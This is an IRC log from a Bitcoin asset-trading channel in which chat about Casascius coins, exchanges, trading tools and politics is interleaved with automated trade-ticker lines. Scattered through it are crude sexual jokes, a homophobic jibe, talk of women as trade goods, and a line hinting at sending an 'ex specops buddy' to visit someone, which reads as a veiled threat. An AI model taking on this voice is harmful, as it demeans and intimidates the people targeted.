reads that and gets all pissed off. Apr 30 01:33:09 i was lucky to break 200 and running so hot they barf after a few hours Apr 30 01:33:24 ya but you're not cool enough. Apr 30 01:33:35 also not running on geopornal thewor. Apr 30 01:37:00 geopornal thewor Apr 30 01:37:17 geonormal tower Apr 30 01:37:45 log-normal grower Apr 30 01:38:02 fogdood. Apr 30 01:38:11 dello? this is hog. Apr 30 01:38:15 bwahayha Apr 30 01:38:41 pig benis Apr 30 01:38:58 penistower power! Apr 30 01:39:39 im a goat! Apr 30 01:40:02 kengay. Apr 30 01:41:01 [HAVELOCK] [VTX] 10 @ 0.45711 = 4.5711 BTC [-] Apr 30 01:41:30 Pope Mercey Apr 30 01:41:31 fuck Apr 30 01:41:36 Pope Mercy Apr 30 01:42:00 [HAVELOCK] [HIM] 1 @ 1.93 BTC [+] Apr 30 01:42:11 that's actually not a bad name for an ultradom like you Apr 30 01:42:59 [HAVELOCK] [VTX] 6 @ 0.46 = 2.76 BTC [+] Apr 30 01:43:01 [HAVELOCK] [VTX] 1 @ 0.4724 BTC [+] Apr 30 01:43:17 lol Apr 30 01:43:35 the pope, the antipope and the mercypope Apr 30 01:45:00 [HAVELOCK] [VTX] 6 @ 0.4724 = 2.8344 BTC [+] Apr 30 01:47:06 and its rota Apr 30 01:47:10 [MPEX] [S.MPOE] 6400 @ 0.00072792 = 4.6587 BTC [+] Apr 30 01:48:04 [HAVELOCK] [SDICE] 1 @ 0.32 BTC [-] Apr 30 01:50:00 [HAVELOCK] [HIM] 1 @ 1.901 BTC [-] Apr 30 01:52:01 [HAVELOCK] [VTX] 6 @ 0.4601 = 2.7606 BTC [-] Apr 30 01:53:00 [HAVELOCK] [VTX] 7 @ 0.47239 = 3.3067 BTC [+] Apr 30 01:54:01 [HAVELOCK] [VTX] 1 @ 0.47239 BTC [+] Apr 30 01:56:51 well Apr 30 01:56:58 lets hope the july bet gets closed soon :) Apr 30 01:57:54 "Bets will not be cancelled because it became impossible for one side to win - in such cases bets are closed and paid early instead. " Apr 30 01:58:23 btw just got a "why hammering nails with microscope" idea Apr 30 01:58:24 seems like it should be closed early assuming the verdict is yes, the latest deliveries count Apr 30 01:58:50 why casascius coins aren't charged after successful delivery only? Apr 30 01:59:01 [HAVELOCK] [VTX] 10 @ 0.45651 = 4.5651 BTC [-] Apr 30 01:59:52 no trouble with insurance and btc rate then... Apr 30 01:59:56 i think they also have gold content no ? Apr 30 02:00:18 the 1btc ones do not.. and the 5btc only plating Apr 30 02:00:43 ah ok Apr 30 02:00:53 5btc is solid nickle Apr 30 02:00:57 25 btc is plating Apr 30 02:01:00 10 btc is silver Apr 30 02:01:03 and the 1000 btc is gold Apr 30 02:01:15 wait, 1k btc is gold ? Apr 30 02:01:17 the 25 btc is gold plated Apr 30 02:01:23 1k btc = what, 100 oz fine gold / Apr 30 02:01:31 1000 btc coin is solid gold .999 i has one Apr 30 02:01:37 its 1 oz Apr 30 02:01:41 ia but what, 1 ounce ? lol k. Apr 30 02:01:46 so tghen still irrelevant, jurov's point stands Apr 30 02:01:52 1 oz of gold, + 1000 BTC key Apr 30 02:01:54 he has gold plated bars at 100 500 and 1000 Apr 30 02:01:56 Inside it Apr 30 02:02:03 The coin itself is irrelevant, almost Apr 30 02:02:13 yeah, an oz of gold? fuck that lol Apr 30 02:02:14 Namworld making the coin's value 99.9% btc Apr 30 02:02:27 Pretty much Apr 30 02:02:34 ironic Apr 30 02:02:37 here's this fine gold coin Apr 30 02:02:42 I'll take it wooden for all I care. Apr 30 02:02:44 the gold in it is pretty much irrelevant. Apr 30 02:02:48 i did buy it when btc was worth much less than now Apr 30 02:02:55 Like, the sticker and key would burn in a fire anyway Apr 30 02:03:04 So why not a polished wooden coin? Apr 30 02:03:14 Stylish Apr 30 02:03:15 i have a bunch of the 10 btc silver ones and got them when 10 btc = an oz of silver Apr 30 02:03:44 my coins are in a 2 hour rates fire proof safe. no fire lol Apr 30 02:04:50 Firefighters take their sweet time, fire burns for 2.1 hour Apr 30 02:05:24 Hmm... do fireproof rating applies to content burning? Apr 30 02:05:34 Namworld polished hardwood is pretty much impossible to catch on fire anyway Apr 30 02:05:41 Because plastic would melt way before burning Apr 30 02:06:14 actually some plastic is thermosetting. it never melts. Apr 30 02:07:20 Yeah, idk what casascius uses... Apr 30 02:07:43 biodegradable cellophane? Apr 30 02:07:48 :D Apr 30 02:07:49 whale mucus Apr 30 02:08:01 [HAVELOCK] [VTX] 9 @ 0.469899 = 4.2291 BTC [+] Apr 30 02:08:54 [BTCTC] [ASICMINER-PT] 1 @ 1.2675 BTC [-] Apr 30 02:09:04 [BTCTC] [ASICMINER-PT] 2 @ 1.266 = 2.532 BTC [-] Apr 30 02:09:15 fun fact of the day : chemically, cellophane, rayon and cellulose are polymers of glucose Apr 30 02:10:00 [HAVELOCK] [VTX] 10 @ 0.4565 = 4.565 BTC [-] Apr 30 02:10:01 Whale mucus? Why not ambergris? "Keeps that fresh Bitcoin smell longer than the competition!" Apr 30 02:10:11 at a guess I'd say he uses recycled mcdonalds burger wrappers Apr 30 02:10:14 yup Apr 30 02:10:19 which he will have in plentiful supply Apr 30 02:11:00 [HAVELOCK] [VTX] 1 @ 0.469899 BTC [+] Apr 30 02:11:01 namworld a house almost never burns for more than 30 mins, there is no way that safe will get damaged Apr 30 02:11:01 [HAVELOCK] [VTX] 5 @ 0.4699 = 2.3495 BTC [+] Apr 30 02:11:07 well the coins Apr 30 02:11:47 the only plasic on the coins is the holograms Apr 30 02:12:21 namworld are you really counseling someone to dial down their fire insurance? Apr 30 02:12:26 [BTCTC] [B.YABMC] 100 @ 0.013001 = 1.3001 BTC [-] Apr 30 02:13:00 [HAVELOCK] [VTX] 1 @ 0.469899 BTC [-] Apr 30 02:20:25 lol i dont think iv ever seen anyone type out ambergris or even know someone who knew what it was Apr 30 02:21:00 [HAVELOCK] [VTX] 10 @ 0.4565 = 4.565 BTC [-] Apr 30 02:21:03 namworld how do you know so much about whale vomit? Apr 30 02:21:03 i know what it is. Apr 30 02:21:22 such a silly thing to know wh? Apr 30 02:21:26 cause it's like very expensive Apr 30 02:21:30 and also used in perfumery Apr 30 02:21:32 yeah it is Apr 30 02:21:42 so that's two good reasons. Apr 30 02:21:47 also he's canadian, thus weird. Apr 30 02:22:00 [HAVELOCK] [VTX] 5 @ 0.4698999 = 2.3495 BTC [+] Apr 30 02:22:01 [HAVELOCK] [VTX] 1 @ 0.4699 BTC [+] Apr 30 02:22:23 i bet the have a lot of whales in canada Apr 30 02:22:25 maybe that is why Apr 30 02:22:28 I hear theres some moosecock in space atm Apr 30 02:23:01 [HAVELOCK] [VTX] 1 @ 0.4698999 BTC [-] Apr 30 02:24:00 [HAVELOCK] [VTX] 5 @ 0.4699 = 2.3495 BTC [+] Apr 30 02:24:32 i slept 4 hours last night... if that... Apr 30 02:24:46 getting up before the sun is weird to me Apr 30 02:25:01 [HAVELOCK] [VTX] 10 @ 0.456001 = 4.56 BTC [-] Apr 30 02:34:00 [HAVELOCK] [KCIM] 1 @ 1.4 BTC [+] Apr 30 02:36:26 [BTCTC] [COG.F] 2 @ 2.4999 = 4.9998 BTC [+] Apr 30 02:37:48 [BTCTC] [CRYPTO-TRADE] 1 @ 0.19987 BTC [-] Apr 30 02:37:56 [BTCTC] [CRYPTO-TRADE] 4 @ 0.1999 = 0.7996 BTC [+] Apr 30 02:41:26 [MPEX] [S.MPOE] 1800 @ 0.00072792 = 1.3103 BTC [+] Apr 30 02:41:28 [MPEX] [S.MPOE] 466 @ 0.00073999 = 0.3448 BTC [+] Apr 30 03:00:27 [MPEX] [S.MPOE] 9534 @ 0.00073999 = 7.0551 BTC [+] Apr 30 03:00:28 [MPEX] [S.MPOE] 1766 @ 0.00074202 = 1.3104 BTC [+] Apr 30 03:00:29 [MPEX] [S.MPOE] 2950 @ 0.00074004 = 2.1831 BTC [-] Apr 30 03:19:55 [MPEX] [S.MPOE] 5000 @ 0.00074202 = 3.7101 BTC [+] Apr 30 03:20:00 hrm AM offline on guild Apr 30 03:20:02 [HAVELOCK] [SDICE] 1 @ 0.32 BTC [-] Apr 30 03:20:20 ;;nethash Apr 30 03:20:21 78723.6093007 Apr 30 03:22:53 and yet... Apr 30 03:28:00 [BTCTC] [ASICMINER-PT] 1 @ 1.2998 BTC [+] Apr 30 03:35:46 [BTCTC] [ASICMINER-PT] 1 @ 1.2501 BTC [-] Apr 30 03:35:54 [BTCTC] [ASICMINER-PT] 1 @ 1.25 BTC [-] Apr 30 03:38:59 [HAVELOCK] [VTX] 2 @ 0.4651 = 0.9302 BTC [+] Apr 30 03:39:01 [HAVELOCK] [VTX] 1 @ 0.4651 BTC [+] Apr 30 03:39:10 https://forums.butterflylabs.com/bfl-forum-miscellaneous/632-getting-ready-april.html#post9395 Apr 30 03:40:00 [HAVELOCK] [VTX] 3 @ 0.4749 = 1.4247 BTC [+] Apr 30 03:40:02 [HAVELOCK] [VTX] 6 @ 0.475 = 2.85 BTC [+] Apr 30 03:40:09 lol Apr 30 03:40:18 [BTCTC] [BTC-TRADING-PT] 1 @ 0.1924 BTC [-] Apr 30 03:40:22 [BTCTC] [BTC-TRADING-PT] 6 @ 0.1923 = 1.1538 BTC [-] Apr 30 03:40:24 2weeks Apr 30 03:40:30 [BTCTC] [BTC-TRADING-PT] 3 @ 0.1922 = 0.5766 BTC [-] Apr 30 03:40:48 [BTCTC] [BTC-TRADING-PT] 1 @ 0.2168 BTC [+] Apr 30 03:41:14 [BTCTC] [S.MPOE-PT] 17 @ 0.000651 = 0.0111 BTC [+] Apr 30 03:41:52 http://lewrockwell.com/rockwell/commissars-want-to-destroy-lrc.html this is distinctly insane. Apr 30 03:42:14 [BTCTC] [S.MPOE-PT] 100 @ 0.000679 = 0.0679 BTC [+] Apr 30 03:42:18 [BTCTC] [BITVPS] 1 @ 0.00081 BTC [+] Apr 30 03:42:22 [BTCTC] [BITVPS] 10 @ 0.0008 = 0.008 BTC [-] Apr 30 03:43:42 kakobrekla https://twitter.com/Mircea_Popescu/status/329033253124190208 Apr 30 03:43:59 :p Apr 30 03:45:23 Then stop demanding hard and fast timeframes for things that we can't give hard and fast timeframes for. Simple as that. I say multiple times "We aren't sure when " and a chorus of people respond back "BUT GIVE US AN ESTIMATE!!!!" Repeat that about Apr 30 03:45:27 20x and that describes the past 6+ months. Like I said earlier in this thread (or maybe it was another one) - the timelines were doled out long before I came on board with BFL. I have worked with what I was handed for this product cycle. Future product cycles, assuming I have Apr 30 03:45:31 the final authoritative say in the matter, will not contain shipping dates or definitive timelines. The one and only answer to "When?" is "When it's done." If you get something other than that from me on future product cycles, you'll either get it by that date or I have been Apr 30 03:45:35 overridden in my stance of not providing dates. I fully realize this statement will probably sneak up and bite me in the ass at some unspecified future date due to reasons I can't possibly imagine at the moment. Apr 30 03:45:39 fuck me Apr 30 03:45:43 lmao spam! Apr 30 03:45:58 myea Apr 30 03:46:03 twas a bit much Apr 30 03:46:16 stop demanding things in exchange for your money Apr 30 03:46:19 this is bitcoin! Apr 30 03:46:59 http://freemarketincome.com/the-future-of-bitcoin-regulation/ Apr 30 03:47:06 repost my article, get the site name wryng Apr 30 03:47:08 priceless. Apr 30 03:48:07 polymedia? there should be a good joke in there somewhere ... Apr 30 03:48:23 i guess there must be Apr 30 03:49:19 [BTCTC] [COGNITIVE] 2 @ 0.1991 = 0.3982 BTC [+] Apr 30 03:50:00 [HAVELOCK] [VTX] 10 @ 0.47498 = 4.7498 BTC [-] Apr 30 03:53:15 so a little ago i used a flavoured condom to buttseks. the girl is now claiming she can taste teh flavour. Apr 30 03:53:28 isthispossible.jpg Apr 30 03:55:18 taste the flavour by licking what? Apr 30 03:55:40 not by licking anything. Apr 30 03:55:54 ... gox should offer volume discounts based on $ value Apr 30 03:55:55 not btc Apr 30 03:56:58 i hate them so much :( Apr 30 03:58:23 mircea_popescu did you also give her a vodka filled tampon? Apr 30 03:58:46 btw mircea_popescu your april 2013 MPOE report was empowering... Apr 30 03:58:46 mno Apr 30 03:58:54 o ? Apr 30 03:58:58 [BTCTC] [ASICMINER-PT] 1 @ 1.2501 BTC [+] Apr 30 03:59:02 [BTCTC] [ASICMINER-PT] 2 @ 1.25 = 2.5 BTC [-] Apr 30 03:59:17 You really rallied the troops in that one. Apr 30 04:00:00 [HAVELOCK] [VTX] 2 @ 0.4651 = 0.9302 BTC [-] Apr 30 04:00:51 could you elaborate this statement a little more: Unfortunately the hordes of get-rich-quick noobs allied with the howling incompetence of so called .exchanges. have prevailed Apr 30 04:01:16 that entire max keiser & co meets mtgox lag episode Apr 30 04:01:32 but are you saying it's a war against the speculators? Apr 30 04:01:48 speculation is one thing. Apr 30 04:02:21 this idiocy where "We all believe the US is the best in the world therefore it is because we agree" programme is not speculation, it's marauding stupidity. Apr 30 04:03:30 bitcoin is a right phenomena. it's natural enemy is the left. this means the horde of like minded lemmings. Apr 30 04:03:36 this is the meaning of "decentralised". Apr 30 04:06:49 Apr 30 04:06:50 Loss : -2`320.17106571 BTC Apr 30 04:06:51 ouch :( Apr 30 04:07:55 enemy of the left? Apr 30 04:08:02 you mean socialism in general? Apr 30 04:08:27 enemy of the collectivists Apr 30 04:08:54 anyone who expects solutions to problems come from the group is left. Apr 30 04:09:01 anyone who expects solutions come from the individual is right Apr 30 04:09:07 that's pretty much the whole story there. Apr 30 04:09:17 but even you depend on a group for mpex...non? Apr 30 04:09:29 or am I viewing this from a confused viewpoint? Apr 30 04:09:32 but but what about groups of individuals? Apr 30 04:09:36 i think so. how do i depend ? Apr 30 04:10:39 why use condom? Apr 30 04:10:40 we all depend on blockchain ;) Apr 30 04:11:03 what point in cornholing if it aint bareback Apr 30 04:11:07 You depend on MPOE-PR for you PR. You have a board of directors you refer to for advice as quoted here: "Unfortunately the hordes of get-rich-quick noobs allied with the howling incompetence of so called .exchanges. have prevailed" it is implied this "we" is a collective. Apr 30 04:11:12 oops Apr 30 04:11:14 dub pff. i always use condoms. Apr 30 04:11:21 prude Apr 30 04:11:29 quoted here: "We.ve been working hard taking apart and examining the price model" Apr 30 04:11:32 take 2 Apr 30 04:11:44 thestringpuller but what's one to do with the other ? Apr 30 04:11:45 so an occaisional UTI results. deal with it Apr 30 04:11:56 dub hehe i am dealing with it. Apr 30 04:11:58 take your vitamins Apr 30 04:12:03 mircea_popescu: I misquoted I'm sorry. I meant the latter. Apr 30 04:12:15 "We've been working hard..." is the key phrase Apr 30 04:12:26 thestringpuller no i get that part. but what's me having a board / employees to do with the group mindset ? Apr 30 04:12:54 Don't you all have to agree? Don't you bounce ideas off each other? Or is that still technically individualism? Apr 30 04:13:12 those groups are formed voluntarily Apr 30 04:13:16 When I think of pure individual contribution I think of people like Tesla. Apr 30 04:13:20 it's not a "everyone has to do their share or else" kinda deal Apr 30 04:13:27 but what's "pure individual contribution" to do with anything ? Apr 30 04:13:45 i think mp's point may be when individuals release power of problem solving to a group Apr 30 04:13:45 listen, there's kids sitting togetgher in a class. this is ideologically neutral. Apr 30 04:13:56 there's kids working on the same homework. this is also ideologically neutral. Apr 30 04:14:06 or maybe rely on group thought? Apr 30 04:14:19 if those kids were to go to the teacher and say "We're not doing our homework and you can't punish us cause you'd hacve to punish the whole class", that's socialist bs. Apr 30 04:14:30 yet this is the "solution" of idiots since forever. Apr 30 04:14:33 http://www.sierrachart.com/index.php?l=doc/Bitcoin.php Apr 30 04:14:54 in the case at hand, "we will all buy btc and the price can only go up because of it and so we will all become millionaires" Apr 30 04:15:02 but that rgument seems to be used quite often by the right Apr 30 04:15:06 they were going to pull themselves up by their own pants. Apr 30 04:15:12 using it already deadweasel :) Apr 30 04:15:18 well inasmuch as it is used it's fakeright Apr 30 04:15:22 hope their live trading gets rolled out soon Apr 30 04:15:28 how do you like it? Apr 30 04:15:35 its gonna suck Apr 30 04:15:38 its good, very stable stream Apr 30 04:15:42 its gonna be as bad as mtgox Apr 30 04:15:52 well yes, it's just a link to mtgox Apr 30 04:15:56 exactly Apr 30 04:16:00 thats why its gonna suck Apr 30 04:16:00 heh Apr 30 04:16:09 gigo Apr 30 04:16:15 but its easier to trade directly off the charts than to log into the site and enter the order every time Apr 30 04:16:24 use goxtool Apr 30 04:16:32 mircea_popescu isn't that a different issue altogether, as you state in your fact, "You can't pull yourself up by your own bootstraps" Apr 30 04:16:36 faq* Apr 30 04:16:38 WOW Apr 30 04:16:39 somehow buying doesnt work on there for me Apr 30 04:16:44 can't type today Apr 30 04:17:10 where's the difference Apr 30 04:17:14 sierra should lease an API/socket feed Apr 30 04:17:16 did you put in the api key? gox --add-secret= Apr 30 04:17:22 goxtoo* Apr 30 04:17:22 l Apr 30 04:17:31 yea, i can sell, but the buy function doesn't work dunno Apr 30 04:17:36 balls Apr 30 04:18:05 oh well. i don't trade enought to purchase charting sfotware. but i want it. Apr 30 04:18:09 have you got permissions set in gox? Apr 30 04:18:33 deadweasel: can you run the native feed without paying? Apr 30 04:18:35 yes, the window for order entry doesn't appear Apr 30 04:18:45 using windows? Apr 30 04:18:54 putty Apr 30 04:19:01 i'm using putty too Apr 30 04:19:04 ya, change to xterm r6 Apr 30 04:19:08 dont use putty Apr 30 04:19:13 i forget the settings tab Apr 30 04:19:15 use kitty Apr 30 04:19:25 ^ even bettah Apr 30 04:19:45 but if you're already running putty, i know how to fix the keyboard fkeys issue. Apr 30 04:19:57 mircea_popescu: there is no difference is there? The group came up, with Max Keiser as their defacto leader, "We can pull ourselves up by our belts", whereas that is a physical impossibility, yet people believed it anyways because other people "said it was so". No? Apr 30 04:20:03 kitty is putty Apr 30 04:20:11 putty is no longer maintained Apr 30 04:20:31 i'm already using some putty variant with clickable urls Apr 30 04:20:39 then feed that kitty and putt it across the room! Apr 30 04:21:40 [MPEX] [S.MPOE] 5200 @ 0.00072615 = 3.776 BTC [-] Apr 30 04:21:42 [MPEX] [S.MPOE] 2300 @ 0.000725 = 1.6675 BTC [-] Apr 30 04:24:18 doesn't work in kitty :[ Apr 30 04:24:35 Good news mircea_popescu: "Facebook Is Losing Millions Of Users In The US And Other Mature Markets" Apr 30 04:26:25 I WONDER WHY Apr 30 04:26:41 cause all the narsasists have taken over Apr 30 04:26:48 okay i got it working deadweasel, had to change the keyboard settings, ty Apr 30 04:26:49 and making people rage quit Apr 30 04:27:00 [HAVELOCK] [KCIM] 1 @ 1.4 BTC [+] Apr 30 04:27:01 [HAVELOCK] [KCIM] 2 @ 1.41 = 2.82 BTC [+] Apr 30 04:27:02 [HAVELOCK] [KCIM] 2 @ 1.4588 = 2.9176 BTC [+] Apr 30 04:27:46 how doe facebook lose users anyway? people actually take the time to close accounts? Apr 30 04:28:18 https://bitcointalk.org/index.php?topic=174620.msg1978520#msg1978520 Apr 30 04:28:18 good q. Apr 30 04:28:19 analytics Apr 30 04:28:29 you can see how many people come to your website... Apr 30 04:28:36 its pretty basic Apr 30 04:29:02 ;;seen smickles Apr 30 04:29:02 smickles was last seen in #bitcoin-assets 3 weeks, 4 days, 9 hours, 46 minutes, and 30 seconds ago: a bitcoin atm could be the easiest way to send money to a friend, each of you just goes to an atm Apr 30 04:29:07 lol Apr 30 04:30:13 ThickAsThieves: people go inactive, someone not logging in for X time is considered the same as losing a user to the social media world. Apr 30 04:30:17 as it depends on an active user base Apr 30 04:30:31 then they should just comment on user activity Apr 30 04:30:34 not user loss Apr 30 04:30:51 but i get it i guess Apr 30 04:32:00 [HAVELOCK] [SDICE] 1 @ 0.32 BTC [-] Apr 30 04:32:59 mircea_popescu: idea: the gold in the casascius coin is a TEOTWAWKI "backup." Apr 30 04:34:18 [BTCTC] [ASICMINER-PT] 1 @ 1.2799 BTC [+] Apr 30 04:35:29 [BTCTC] [ASICMINER-PT] 1 @ 1.28 BTC [+] Apr 30 04:38:15 well it'd have to be the end of PART of the world then Apr 30 04:38:37 [BTCTC] [ASICMINER-PT] 2 @ 1.2799 = 2.5598 BTC [-] Apr 30 04:38:52 mircea_popescu: new idea. 7.62x39mm round with built-in BTC chip. Apr 30 04:39:46 mircea_popescu: for those who await the lead, rather than the gold, standard. Apr 30 04:40:34 lol Apr 30 04:40:48 dude copumpkin is a twitter badass. check out what he dug up Apr 30 04:40:53 http://finallyfeminism101.wordpress.com/2007/10/19/sexism-definition/ Apr 30 04:41:02 Sexism is both discrimination based on gender and the attitudes, stereotypes, and the cultural elements that promote this discrimination. Given the historical and continued imbalance of power, where men as a class are privileged over women as a class (see male privilege), an important, but often overlooked, part of the term is that sexism is prejudice plus power. Thus feminists reject the notion that women can be sexis Apr 30 04:41:02 t towards men because women lack the institutional power that men have. Apr 30 04:41:13 also they reject e=mc2 as a sexed equation, Apr 30 04:41:27 because it privileges the speed of light over other speeds that are much more important to us. Apr 30 04:42:25 mircea_popescu: ho hum. there's a whole dark underworld of this crud, esp. in the U.S.; and the perpetrators are often salaried academics and their flunkies. Apr 30 04:42:54 salaried pseudoacademics Apr 30 04:43:19 doing whatever "social sciences" a la women's research or w/e Apr 30 04:43:40 mircea_popescu: actual academics mostly went extinct after ww2. (you'll meet the occasional one, preserved, like the occasional panda still alive in some zoo) Apr 30 04:44:03 i am currently pining all hopes of universalist humanity on the taleb fellow Apr 30 04:44:11 he's been doing off the deep end superbly on twitter. Apr 30 04:44:41 kweli Apr 30 04:44:44 ? Apr 30 04:44:52 o look, she retweeted me too. dense is she. Apr 30 04:44:58 dub nassim taleb Apr 30 04:45:31 https://twitter.com/nntaleb/status/328902329015353345 sample Apr 30 04:46:08 mircea_popescu: on the death of academia: http://unqualified-reservations.blogspot.com/2007/07/my-navrozov-moments.html (moldbug) Apr 30 04:46:38 [BTCTC] [ASICMINER-PT] 4 @ 1.236 = 4.944 BTC [-] Apr 30 04:46:46 [BTCTC] [ASICMINER-PT] 1 @ 1.2351 BTC [-] Apr 30 04:46:50 [BTCTC] [ASICMINER-PT] 2 @ 1.23505 = 2.4701 BTC [-] Apr 30 04:46:53 [BTCTC] [ASICMINER-PT] 2 @ 1.23505 = 2.4701 BTC [-] Apr 30 04:46:56 [BTCTC] [ASICMINER-PT] 2 @ 1.22 = 2.44 BTC [-] Apr 30 04:47:00 aww grad school. poor modlbug Apr 30 04:47:01 [BTCTC] [ASICMINER-PT] 1 @ 1.21 BTC [-] Apr 30 04:47:11 [BTCTC] [ASICMINER-PT] 1 @ 1.205 BTC [-] Apr 30 04:47:16 [BTCTC] [ASICMINER-PT] 5 @ 1.202 = 6.01 BTC [-] Apr 30 04:47:22 [BTCTC] [ASICMINER-PT] 1 @ 1.2 BTC [-] Apr 30 04:47:26 hah, nassim Apr 30 04:47:27 [BTCTC] [ASICMINER-PT] 1 @ 1.2 BTC [-] Apr 30 04:47:29 https://fbcdn-profile-a.akamaihd.net/hprofile-ak-prn1/c0.17.180.180/s160x160/24919_388859208374_202563_a.jpg heh Apr 30 04:47:31 i'm reading one of his books Apr 30 04:47:47 yeah, this one Apr 30 04:47:50 black swan Apr 30 04:48:15 he's a clever fellow. Apr 30 04:49:52 yep, i like how he's questioning everything Apr 30 04:50:00 [HAVELOCK] [KCIM] 1 @ 1.459 BTC [+] Apr 30 04:50:02 [HAVELOCK] [KCIM] 2 @ 1.45989998 = 2.9198 BTC [+] Apr 30 04:50:03 [HAVELOCK] [KCIM] 4 @ 1.46496 = 5.8598 BTC [+] Apr 30 04:50:04 [HAVELOCK] [KCIM] 3 @ 1.46498 = 4.3949 BTC [+] Apr 30 04:52:55 is he really questioning everything? Apr 30 04:52:57 [BTCTC] [ASICMINER-PT] 1 @ 1.19021 BTC [-] Apr 30 04:52:57 i loved antifragile Apr 30 04:53:00 [BTCTC] [ASICMINER-PT] 1 @ 1.19011 BTC [-] Apr 30 04:53:08 [BTCTC] [ASICMINER-PT] 5 @ 1.17005 = 5.8503 BTC [-] Apr 30 04:53:12 [BTCTC] [ASICMINER-PT] 5 @ 1.17 = 5.85 BTC [-] Apr 30 04:53:13 it just felt so refreshing Apr 30 04:53:15 [BTCTC] [ASICMINER-PT] 8 @ 1.16914 = 9.3531 BTC [-] Apr 30 04:53:29 o hey mjr Apr 30 04:53:31 [BTCTC] [ASICMINER-PT] 1 @ 1.167 BTC [-] Apr 30 04:53:37 hey guys Apr 30 04:53:40 [BTCTC] [ASICMINER-PT] 5 @ 1.165 = 5.825 BTC [-] Apr 30 04:53:48 [BTCTC] [ASICMINER-PT] 1 @ 1.164 BTC [-] Apr 30 04:53:56 [BTCTC] [ASICMINER-PT] 19 @ 1.152 = 21.888 BTC [-] Apr 30 04:53:59 where have you been, you missed like 5 dudes rolling by on their skateboards announcing new exchanges Apr 30 04:54:59 [BTCTC] [ASICMINER-PT] 1 @ 1.152 BTC [-] Apr 30 04:55:03 [BTCTC] [ASICMINER-PT] 1 @ 1.1512 BTC [-] Apr 30 04:55:11 [BTCTC] [ASICMINER-PT] 1 @ 1.1512 BTC [-] Apr 30 04:55:19 [BTCTC] [ASICMINER-PT] 7 @ 1.1511 = 8.0577 BTC [-] Apr 30 04:55:20 kakobrekla: "The skateboard ride to Saks today was a little rough, but the skateboard back was great!" I am not joking that is the latest status update from coinsetter CEO...he's a nice guy Apr 30 04:55:23 [BTCTC] [ASICMINER-PT] 2 @ 1.151 = 2.302 BTC [-] Apr 30 04:55:26 [BTCTC] [ASICMINER-PT] 10 @ 1.150101 = 11.501 BTC [-] Apr 30 04:55:35 [BTCTC] [ASICMINER-PT] 10 @ 1.1501 = 11.501 BTC [-] Apr 30 04:55:38 [BTCTC] [ASICMINER-PT] 1 @ 1.15 BTC [-] Apr 30 04:55:46 but i can't help but laugh after our convo in romania lol Apr 30 04:55:48 he sounds like permafriendzoned Apr 30 04:55:57 WTF really?! Apr 30 04:56:04 poor guy Apr 30 04:56:07 i am not joking Apr 30 04:56:15 he's cool, he's in nyc Apr 30 04:56:19 you met him? Apr 30 04:56:21 yeah Apr 30 04:56:23 when Apr 30 04:56:34 we were talking about working together, but couldn't get the equity to work... Apr 30 04:56:42 he already had prior investors etcf Apr 30 04:56:48 [BTCTC] [ASICMINER-PT] 5 @ 1.13205 = 5.6603 BTC [-] Apr 30 04:56:51 [BTCTC] [ASICMINER-PT] 1 @ 1.132 BTC [-] Apr 30 04:56:55 [BTCTC] [ASICMINER-PT] 3 @ 1.13 = 3.39 BTC [-] Apr 30 04:56:58 hm Apr 30 04:57:07 they are opening sometime this summer i think? Apr 30 04:57:39 but mostly focusing on the shorting/margin side, from what i know...jaron from coinsetter Apr 30 04:57:52 im selling my mpex account Apr 30 04:57:55 if anyone is wanting one Apr 30 04:57:59 there are no assets in it Apr 30 04:58:32 it is mostly to get out of paying the ridiculous 30 btc fee Apr 30 04:58:36 https://kirillwashere.com/galleries/set-miami-april-25/photos/13384 <--- why i love and hate america Apr 30 04:58:44 mjr___ are they using gox or what Apr 30 04:58:49 grubles, how much? Apr 30 04:59:15 also...how would you guarantee you won't retain the key? Apr 30 05:00:19 kakobrekla: not sure, but we just got market data working and order flow Apr 30 05:02:23 Gods and Monsters by Lana Del Rey Apr 30 05:05:52 [MPEX] [S.MPOE] 28050 @ 0.000725 = 20.3363 BTC [-] Apr 30 05:13:16 [BTCTC] [ASICMINER-PT] 1 @ 1.13112 BTC [+] Apr 30 05:13:23 [BTCTC] [ASICMINER-PT] 1 @ 1.13102 BTC [-] Apr 30 05:14:56 [BTCTC] [ASICMINER-PT] 2 @ 1.13 = 2.26 BTC [-] Apr 30 05:15:02 [BTCTC] [ASICMINER-PT] 3 @ 1.13 = 3.39 BTC [-] Apr 30 05:20:13 [BTCTC] [ASICMINER-PT] 1 @ 1.2397 BTC [+] Apr 30 05:20:19 [BTCTC] [ASICMINER-PT] 1 @ 1.2398 BTC [+] Apr 30 05:20:23 [BTCTC] [ASICMINER-PT] 12 @ 1.24 = 14.88 BTC [+] Apr 30 05:26:20 mircea_popescu, Apr 30 05:26:25 you around broseph Apr 30 05:30:52 [BTCTC] [ASICMINER-PT] 1 @ 1.2489 BTC [+] Apr 30 05:31:04 [BTCTC] [ASICMINER-PT] 1 @ 1.249 BTC [+] Apr 30 05:31:09 [BTCTC] [ASICMINER-PT] 3 @ 1.25 = 3.75 BTC [+] Apr 30 05:35:20 hrm, got an ex specops buddy traveling to italy next week, should get him to pay alberto a visit Apr 30 05:36:19 [BTCTC] [ASICMINER-PT] 2 @ 1.25 = 2.5 BTC [+] Apr 30 05:48:35 yeh Apr 30 05:48:41 grubles sup Apr 30 05:50:28 mircea_popescu: hey what up Apr 30 05:50:42 nothing much Apr 30 06:26:27 mircea_popescu: you are one of my favorite people Apr 30 06:26:36 if I bring you women can I hang out with you in Romania? Apr 30 06:26:38 :D Apr 30 06:26:46 I need a vacation... Apr 30 06:36:03 [BTCTC] [ASICMINER-PT] 1 @ 1.2597 BTC [+] Apr 30 06:36:42 [BTCTC] [ASICMINER-PT] 1 @ 1.2599 BTC [+] Apr 30 06:37:20 [BTCTC] [ASICMINER-PT] 3 @ 1.26 = 3.78 BTC [+] Apr 30 06:38:54 [BTCTC] [ASICMINER-PT] 1 @ 1.26 BTC [+] Apr 30 06:43:34 lol Apr 30 06:44:24 y u laffin Apr 30 06:44:53 asicminer price? Apr 30 06:45:23 the guy and his women Apr 30 06:45:43 he is offering you women Apr 30 06:45:50 why must you laugh Apr 30 06:46:50 im just that sorta guy. Apr 30 06:47:18 what, homo? Apr 30 06:51:18 no homo Apr 30 06:51:55 so deal, 3 women for 1 night stay? Apr 30 06:51:57 lololol Apr 30 06:52:01 [HAVELOCK] [SDICE] 1 @ 0.32 BTC [-] Apr 30 06:52:08 (it feels like medieval times) Apr 30 06:53:08 you can stay at my place if you have 3 women Apr 30 06:55:56 [BTCTC] [MININGCO.ETF] 2 @ 0.679 = 1.358 BTC [+] Apr 30 06:57:49 where you gonna find 3 womenz. Apr 30 06:59:25 